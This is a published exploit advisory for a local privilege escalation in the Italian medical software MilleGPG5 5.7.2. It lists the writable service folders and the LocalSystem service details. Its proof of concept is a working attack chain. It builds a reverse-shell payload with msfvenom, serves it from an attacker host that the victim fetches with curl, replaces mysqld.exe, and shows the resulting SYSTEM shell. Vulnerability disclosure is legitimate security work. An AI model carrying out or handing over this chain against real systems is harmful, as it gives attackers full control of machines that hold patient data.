MilleGPG5 5.7.2 Luglio 2021 Privilege Escalation

`# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation  
# Date: 2021-07-19  
# Author: Alessandro 'mindsflee' Salzano  
# Vendor Homepage: https://millegpg.it/  
# Software Homepage: https://millegpg.it/  
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe  
# Version: 5.7.2  
# Tested on: Microsoft Windows 10 Enterprise x64  
  
MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".  
  
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.  
  
Affected version: MilleGPG5 5.7.2  
  
# Details  
# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.  
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace  
# with a malicious file that would connect back to an attacking computer giving system level privileges  
# (nt authority\system) due to the service running as Local System.  
# While a low privilege user is unable to restart the service through the application, a restart of the  
# computer triggers the execution of the malicious file.  
  
(1) Impacted services.  
Any low privileged user can elevate their privileges abusing these services:  
  
C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe  
C:\Program Files\MilleGPG5\GPGService.exe  
  
  
Details:  
  
  
SERVICE_NAME: MariaDB-GPG  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program  
Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : MariaDB-GPG  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
------  
  
SERVICE_NAME: GPGOrchestrator  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : GPG Orchestrator  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
(2) Folder permissions.  
Insecure folders permissions issue:  
  
  
C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)  
NT SERVICE\TrustedInstaller:(I)(F)  
NT  
SERVICE\TrustedInstaller:(I)(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT  
AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE  
AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE  
AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)  
APPLICATION PACKAGE  
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE  
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)  
...[SNIP]...  
---------------  
  
C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)  
NT SERVICE\TrustedInstaller:(I)(F)  
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(RX)  
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL  
APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL  
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED  
APPLICATION PACKAGES:(I)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED  
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)  
  
  
# Proof of Concept  
  
1. Generate malicious .exe on attacking machine  
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe  
  
2. Setup listener and ensure apache is running on attacking machine  
nc -lvp 4242  
service apache2 start  
  
3. Download malicious .exe on victim machine  
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"  
  
4. Overwrite file and copy malicious .exe.  
Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak  
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe  
  
5. Restart victim machine  
  
6. Reverse Shell on attacking machine opens  
C:\Windows\system32>whoami  
whoami  
nt authority\system  
  
`